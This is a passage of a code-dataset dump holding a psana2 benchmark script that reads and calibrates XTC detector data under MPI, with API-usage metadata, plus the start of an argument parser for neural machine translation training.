"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 237, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 237, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 253, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 258, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 273, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 273, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 274, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 274, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 277, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 278, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 315, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 316, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}]} +{"seq_id": "19365984025", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport socket\nimport psana\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom pickle import dump\n\nfrom benchmarking import Event,\\\n set_defaults,\\\n event_here, start, stop, log, event_log\n\n\n\n\n#\n# PSANA2 BENCHMARK, based on CCTBX's XTC_PROCESS pipeline.\n# COMMENT: I've started with cctbx_project/xfel/xtc_process.py and stripped\n# out all the things that I don't think are relevant to this benchmark\n#\n\n\n\n\n@log\ndef get_calib_file_path(env, address, run):\n \"\"\" Findes the path to the SLAC metrology file stored in a psana\n environment object's calibration store\n @param env psana environment object\n @param address address string for a detector\n @param run psana run object or run number\n \"\"\"\n\n from psana import Detector\n\n\n #\n # try to get it from the detector interface\n #\n\n try:\n start(\"load geometry from detector\")\n psana_det = Detector(address, run.env())\n ret = psana_det.pyda.geoaccess(run.run()).path\n stop(\"load geometry from detector\")\n\n return ret\n except Exception as e:\n pass\n\n\n #\n # try to get it from the calib store directly\n #\n\n from psana import ndarray_uint8_1, Source\n\n start(\"load geometry from calib store\")\n cls = env.calibStore()\n src = Source('DetInfo(%s)'%address)\n path_nda = cls.get(ndarray_uint8_1, src, 'geometry-calib')\n stop(\"load geometry from calib store\")\n\n if path_nda is None:\n return None\n return ''.join(map(chr, path_nda))\n\n\n\n@log\ndef env_dxtbx_from_slac_metrology(run, address):\n \"\"\" Loads a dxtbx cspad cbf header only object from the metrology path\n stored in a psana run object's calibration store\n @param env psana run object\n @param address address string for a detector\n \"\"\"\n\n start(\"load geometry data from detector\")\n det = run.Detector(address)\n geometry = det.raw.geometry()\n stop(\"load geometry data from detector\")\n\n if geometry is None:\n metro_path = get_calib_file_path(run.env(), address, run)\n elif geometry.valid:\n metro_path = None\n else:\n raise RuntimeError(f\"Could not read geometry, hostname: {socket.gethostname()}\")\n\n if metro_path is None and geometry is None:\n return None\n\n\n return None\n\n\n\n@log\ndef get_psana_corrected_data(psana_det, evt, use_default=False, dark=True,\n common_mode=None, apply_gain_mask=True,\n gain_mask_value=None, per_pixel_gain=False,\n gain_mask=None, additional_gain_factor=None):\n \"\"\"\n Given a psana Detector object, apply corrections as appropriate and return\n the data from the event\n @param psana_det psana Detector object\n @param evt psana event\n @param use_default If true, apply the default calibration only, using the\n psana algorithms. Otherise, use the corrections specified by the rest of\n the flags and values passed in.\n @param dark Whether to apply the detector dark, bool or numpy array\n @param common_mode Which common mode algorithm to apply. None: apply no\n algorithm. Default: use the algorithm specified in the calib folder.\n Otherwise should be a list as specified by the psana documentation for\n common mode customization\n @param apply_gain_mask Whether to apply the common mode gain mask correction\n @param gain_mask_value Multiplier to apply to the pixels, according to the\n gain mask\n @param per_pixel_gain If available, use the per pixel gain deployed to the\n calibration folder\n @param gain_mask gain mask showing which pixels to apply gain mask value\n @param additional_gain_factor Additional gain factor. Pixels counts are\n divided by this number after all other corrections.\n @return Numpy array corrected as specified.\n \"\"\"\n\n # order is pedestals, then common mode, then gain mask, then per pixel gain\n\n # HACK: Force psana v2 behaviour\n PSANA2_VERSION = True\n\n\n start(\"psana_det.raw\")\n if PSANA2_VERSION:\n # in psana2, data are stored as raw, fex, etc so the selection\n # has to be given here when the detector interface is used.\n # for now, assumes cctbx uses \"raw\".\n psana_det = psana_det.raw\n stop(\"psana_det.raw\")\n\n\n if use_default:\n start(\"psana_det.calib\")\n ret = psana_det.calib(evt) # applies psana's complex run-dependent calibrations\n stop(\"psana_det.calib\")\n return ret\n\n\n start(\"psana_det.raw_data(evt)\")\n data = psana_det.raw_data(evt)\n stop(\"psana_det.raw_data(evt)\")\n if data is None:\n return\n\n\n start(\"subtract psana_det.pedestals()\")\n data = data.astype(np.float64)\n if isinstance(dark, bool):\n if dark:\n if PSANA2_VERSION:\n data -= psana_det.pedestals()\n else:\n data -= psana_det.pedestals(evt)\n elif isinstance( dark, np.ndarray ):\n data -= dark\n stop(\"subtract psana_det.pedestals()\")\n\n\n if common_mode is not None and common_mode != \"default\":\n print(\"Applying common mode\")\n\n start(\"psana_det.common_mode_apply(data, common_mode)\")\n if common_mode == 'cspad_default':\n common_mode = (1,25,25,100,1) # default parameters for CSPAD images\n psana_det.common_mode_apply(data, common_mode)\n elif common_mode == 'unbonded':\n common_mode = (5,0,0,0,0) # unbonded pixels used for correction\n psana_det.common_mode_apply(data, common_mode)\n else: # this is how it was before.. Though I think common_mode would need to be a tuple..\n psana_det.common_mode_apply(data, common_mode)\n stop(\"psana_det.common_mode_apply(data, common_mode)\")\n else:\n print(\"Not applying common mode\")\n \n\n if apply_gain_mask:\n print(\"Applying gain mask\")\n\n start(\"apply gain mask\")\n if gain_mask is None: # TODO: consider try/except here\n gain_mask = psana_det.gain_mask(evt) == 1\n if gain_mask_value is None:\n try:\n gain_mask_value = psana_det._gain_mask_factor\n except AttributeError:\n print(\"No gain set for psana detector, using gain value of 1, consider disabling gain in your phil file\")\n gain_mask_value = 1\n data[gain_mask] = data[gain_mask]*gain_mask_value\n stop(\"apply gain mask\")\n else:\n print(\"Not applying gain mask\")\n\n\n if per_pixel_gain: # TODO: test this\n start(\"applying psana_det.gain()\")\n data *= psana_det.gain()\n stop(\"applying psana_det.gain()\")\n\n\n if additional_gain_factor is not None:\n data /= additional_gain_factor\n\n\n return data\n\n\n\n@log\ndef process_event(run, evt, psana_det):\n \"\"\"\n Process a single event from a run\n @param run psana run object\n @param timestamp psana timestamp object\n \"\"\"\n\n\n # HACK: Force psana v2 behaviour\n PSANA2_VERSION = True\n\n start(\"construct event timestamp\")\n if PSANA2_VERSION:\n sec = evt._seconds\n nsec = evt._nanoseconds\n else:\n time = evt.get(psana.EventId).time()\n fid = evt.get(psana.EventId).fiducials()\n sec = time[0]\n nsec = time[1]\n\n ts = Event.as_timestamp(sec, nsec/1e6)\n stop(\"construct event timestamp\")\n\n print(\"Accepted\", ts)\n\n # HACK: these parameters have been extracted from a xtc_process run\n data = get_psana_corrected_data(psana_det, evt, use_default=False,\n dark=True, common_mode=None,\n apply_gain_mask=True, gain_mask_value=6.85,\n per_pixel_gain=False,\n additional_gain_factor=None)\n\n\n if data is None:\n print(\"ERROR! No data\")\n return\n\n\n timestamp = t = ts\n s = t[0:4] + t[5:7] + t[8:10] + t[11:13] + t[14:16] + t[17:19] + t[20:23]\n print(\"Loaded shot\", s)\n\n \n\n@log\ndef test_xtc_read(ds, comm, det_name):\n\n for run in ds.runs():\n\n start(f\"run.Detector({ds.det_name})\")\n det = run.Detector(ds.det_name)\n stop(f\"run.Detector({ds.det_name})\")\n\n # TODO: fix flex dependency\n # if comm.Get_rank() == 0:\n # PS_CALIB_DIR = os.environ.get('PS_CALIB_DIR')\n # assert PS_CALIB_DIR\n # dials_mask = easy_pickle.load(params.format.cbf.invalid_pixel_mask)\n # else:\n # dials_mask = None\n # dials_mask = comm.bcast(dials_mask, root=0)\n\n start(\"for evt in run.events()\")\n for evt in run.events():\n env_dxtbx_from_slac_metrology(run, det_name)\n\n process_event(run, evt, det)\n stop(\"for evt in run.events()\")\n\n\n\n\nif __name__ == \"__main__\":\n\n # Defaul data\n default_parameters = {\n \"exp\" : \"cxid9114\",\n \"run\" : 1,\n \"dir\" : \"/img/data/xtc_test\",\n \"max_events\" : 0,\n \"det_name\" : \"cspad\"\n }\n\n\n # Input args allowed by psana.DataSource\n psana_args = [\"exp\", \"run\", \"dir\", \"max_events\", \"det_name\", \"batch_size\"]\n\n\n #\n # Parse input arguments\n #\n\n parser = ArgumentParser()\n\n for arg in psana_args:\n parser.add_argument(f\"--{arg}\", help=\"psana.DataSource kwarg\")\n\n parser.add_argument(\"--of\",\n help=\"Log dir -- every rank will write its own log file\")\n\n # Get args dict, and sanitize None types\n args = vars(parser.parse_args())\n\n output_name = args[\"of\"]\n del args[\"of\"] # don't pass this to psana\n\n psana_kwargs = set_defaults(args, default_parameters)\n\n\n\n #\n # Initialize MPI\n #\n\n start(\"INIT MPI\")\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n stop(\"INIT MPI\")\n\n rank = comm.Get_rank() # each process in MPI has a unique id, 0-indexed\n\n\n #\n # Run Benchmark\n #\n\n if rank == 0:\n print(\"MPI Initialized, Running xtc_read Benchmark\")\n\n start(f\"psana.DataSource({psana_kwargs})\")\n ds = psana.DataSource(**psana_kwargs)\n stop(f\"psana.DataSource({psana_kwargs})\")\n\n test_xtc_read(ds, comm, psana_kwargs[\"det_name\"])\n\n\n #\n # Save log files\n #\n\n if rank == 0:\n print(\"Writing logs\")\n\n log_path = os.path.join(output_name, f\"debug_{rank}.txt\")\n with open(log_path, \"w\") as f:\n for entry in event_log(cctbx_fmt=True):\n print(entry, file=f)\n", "repo_name": "JBlaschke/psana2_benchmarks", "sub_path": "opt/benchmark_xtc_read.py", "file_name": "benchmark_xtc_read.py", "file_ext": "py", "file_size_in_byte": 10502, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "benchmarking.start", "line_number": 45, "usage_type": "call"}, {"api_name": "psana.Detector", "line_number": 46, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 48, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 61, "usage_type": "call"}, {"api_name": "psana.Source", "line_number": 63, "usage_type": "call"}, {"api_name": "psana.ndarray_uint8_1", "line_number": 64, "usage_type": "argument"}, {"api_name": "benchmarking.stop", "line_number": 65, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 28, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 81, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 84, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 91, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 73, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 136, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 142, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 146, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 148, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 152, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 154, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 167, "usage_type": "attribute"}, {"api_name": "benchmarking.stop", "line_number": 169, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 175, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 184, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 192, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 202, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 208, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 210, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 101, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 233, "usage_type": "call"}, {"api_name": "psana.EventId", "line_number": 238, "usage_type": "attribute"}, {"api_name": "psana.EventId", "line_number": 239, "usage_type": "attribute"}, {"api_name": "benchmarking.Event.as_timestamp", "line_number": 243, "usage_type": "call"}, {"api_name": "benchmarking.Event", "line_number": 243, "usage_type": "name"}, {"api_name": "benchmarking.stop", "line_number": 244, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 221, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 272, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 274, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 285, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 290, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 267, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 315, "usage_type": "call"}, {"api_name": "benchmarking.set_defaults", "line_number": 329, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 337, "usage_type": "call"}, {"api_name": "mpi4py.MPI.COMM_WORLD", "line_number": 339, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 339, "usage_type": "name"}, {"api_name": "benchmarking.stop", "line_number": 340, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 352, "usage_type": "call"}, {"api_name": "psana.DataSource", "line_number": 353, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 354, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path", "line_number": 366, "usage_type": "attribute"}, {"api_name": "benchmarking.event_log", "line_number": 368, "usage_type": "call"}]} +{"seq_id": "40041528526", "text": "\"\"\"train_config.py: Parse training arguments and create config dictionnary.\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport sys\nimport six\n\nfrom nmt_chainer.utilities import argument_parsing_tools\n\nlogging.basicConfig()\nlog = logging.getLogger(\"rnns:train_config\")\nlog.setLevel(logging.INFO)\n\n_CONFIG_SECTION_TO_DESCRIPTION = {\"model\": \"Model Description\",\n \"training\": \"Training Parameters\",\n \"training_management\": \"Training Management and Monitoring\"}\n\n\ndef define_parser(parser):\n parser.add_argument(\"data_prefix\", nargs=\"?\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"prefix of the training data created by make_data.py\")\n parser.add_argument(\"save_prefix\", nargs=\"?\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"prefix to be added to all files created during the training\")\n\n model_description_group = parser.add_argument_group(_CONFIG_SECTION_TO_DESCRIPTION[\"model\"])\n model_description_group.add_argument(\"--Ei\", type=int, default=640, help=\"Source words embedding size.\")\n model_description_group.add_argument(\"--Eo\", type=int, default=640, help=\"Target words embedding size.\")\n model_description_group.add_argument(\"--Hi\", type=int, default=1024, help=\"Source encoding layer size.\")\n model_description_group.add_argument(\"--Ho\", type=int, default=1024, help=\"Target hidden layer size.\")\n model_description_group.add_argument(\"--Ha\", type=int, default=1024, help=\"Attention Module Hidden layer size.\")\n model_description_group.add_argument(\"--Hl\", type=int, default=512, help=\"Maxout output size.\")\n model_description_group.add_argument(\"--encoder_cell_type\", default=\"lstm\", help=\"cell type of encoder. format: type,param1:val1,param2:val2,...\") # where type is in [%s]\"%(\" \".join(rnn_cells.cell_dict.keys())))\n model_description_group.add_argument(\"--decoder_cell_type\", default=\"lstm\", help=\"cell type of decoder. format same as for encoder\")\n model_description_group.add_argument(\"--lexical_probability_dictionary\", help=\"lexical translation probabilities in zipped JSON format. Used to implement https://arxiv.org/abs/1606.02006\")\n model_description_group.add_argument(\"--lexicon_prob_epsilon\", default=1e-3, type=float, help=\"epsilon value for combining the lexical probabilities\")\n model_description_group.add_argument(\"--use_deep_attn\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--use_accumulated_attn\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--init_orth\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--use_bn_length\", default=0, type=int)\n model_description_group.add_argument(\"--use_goto_attention\", default=False, action=\"store_true\")\n \n model_description_group.add_argument(\"--use_ff_model\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--ff_d_model\", type=int, default=512, help=\"FF model d_model\")\n model_description_group.add_argument(\"--ff_n_heads\", type=int, default=8, help=\"FF model number of attention heads\")\n model_description_group.add_argument(\"--ff_nb_layers_src\", type=int, default=6, help=\"FF model number of source layers\")\n model_description_group.add_argument(\"--ff_nb_layers_tgt\", type=int, default=6, help=\"FF model number of target layers\")\n model_description_group.add_argument(\"--ff_dropout\", type=float, help=\"FF model dropout\")\n model_description_group.add_argument(\"--ff_d_ff\", type=int, default=2048, help=\"FF model d_ff\")\n model_description_group.add_argument(\"--ff_use_exp_relu\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--ff_residual_mode\", default=\"normal\", choices=\"normal none after\".split())\n model_description_group.add_argument(\"--ff_no_normalize\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--use_own_layer_normalization\", default=False, action=\"store_true\")\n \n training_paramenters_group = parser.add_argument_group(_CONFIG_SECTION_TO_DESCRIPTION[\"training\"])\n training_paramenters_group.add_argument(\"--mb_size\", type=int, default=64, help=\"Minibatch size\")\n training_paramenters_group.add_argument(\"--nb_batch_to_sort\", type=int, default=20, help=\"Sort this many batches by size.\")\n training_paramenters_group.add_argument(\"--noise_on_prev_word\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--l2_gradient_clipping\", type=float, default=1, help=\"L2 gradient clipping. 0 for None\")\n training_paramenters_group.add_argument(\"--hard_gradient_clipping\", type=float, nargs=2, help=\"hard gradient clipping.\")\n training_paramenters_group.add_argument(\"--weight_decay\", type=float, help=\"Weight decay value. \")\n training_paramenters_group.add_argument(\"--optimizer\", choices=[\"sgd\", \"rmsprop\", \"rmspropgraves\",\n \"momentum\", \"nesterov\", \"adam\", \"scheduled_adam\", \"adagrad\", \"adadelta\"],\n default=\"adam\", help=\"Optimizer type.\")\n training_paramenters_group.add_argument(\"--learning_rate\", type=float, default=0.01, help=\"Learning Rate\")\n training_paramenters_group.add_argument(\"--momentum\", type=float, default=0.9, help=\"Momentum term\")\n training_paramenters_group.add_argument(\"--randomized_data\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--no_shuffle_of_training_data\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--use_reinf\", default=False, action=\"store_true\")\n 